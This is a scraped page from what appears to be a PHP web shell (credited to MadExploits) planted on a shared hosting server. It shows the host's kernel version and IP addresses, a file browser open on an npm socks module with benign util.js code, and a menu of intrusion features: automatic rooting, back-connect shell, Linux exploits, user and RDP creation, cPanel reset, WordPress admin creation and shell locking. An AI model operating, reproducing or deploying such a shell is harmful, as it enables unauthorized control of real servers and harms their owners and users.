Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.142.195.61
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
socks /
build /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
constants.js
6.34
KB
-rw-r--r--
constants.js.map
2.16
KB
-rw-r--r--
helpers.js
3.85
KB
-rw-r--r--
helpers.js.map
2.67
KB
-rw-r--r--
receivebuffer.js
1.5
KB
-rw-r--r--
receivebuffer.js.map
1.57
KB
-rw-r--r--
util.js
638
B
-rw-r--r--
util.js.map
648
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * Error wrapper for SocksClient */ class SocksClientError extends Error { constructor(message, options) { super(message); this.options = options; } } exports.SocksClientError = SocksClientError; /** * Shuffles a given array. * @param array The array to shuffle. */ function shuffleArray(array) { for (let i = array.length - 1; i > 0; i--) { let j = Math.floor(Math.random() * (i + 1)); [array[i], array[j]] = [array[j], array[i]]; } } exports.shuffleArray = shuffleArray; //# sourceMappingURL=util.js.map
Close